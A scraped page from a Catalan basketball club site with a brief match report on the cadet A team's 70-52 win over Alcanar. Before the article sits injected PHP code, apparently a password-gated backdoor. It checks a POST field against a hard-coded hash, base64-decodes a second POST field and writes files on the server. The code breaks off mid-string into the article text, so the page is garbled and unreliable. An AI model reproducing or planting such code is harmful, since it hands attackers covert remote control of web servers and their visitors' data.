function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El domini del rebot permet la victòria del cadet masculí A contra l'Alcanar (70-52) - Tgn Bàsquet Club -

El domini del rebot permet la victòria del cadet masculí A contra l’Alcanar (70-52)

Updated: abril 7, 2014

El cadet masculí A va vèncer l’Alcanar en un partit que es va trencar en la segona meitat. Els visitants, que es van situar en defensa en zona de sortida, van encaixar un parcial de 9-0 que els va obligar a demanar un temps mort. El conjunt lila jugava ràpid en atac però la seva falta d’encert no els va permetre sentenciar fins que al tercer quart i, sobretot a l’inici del quart (parcial de 12-1) va aconseguir un avantatge definitiu (24 punts) gràcies als rebots ofensius, que permetien tenir segones i terceres opcions de tir.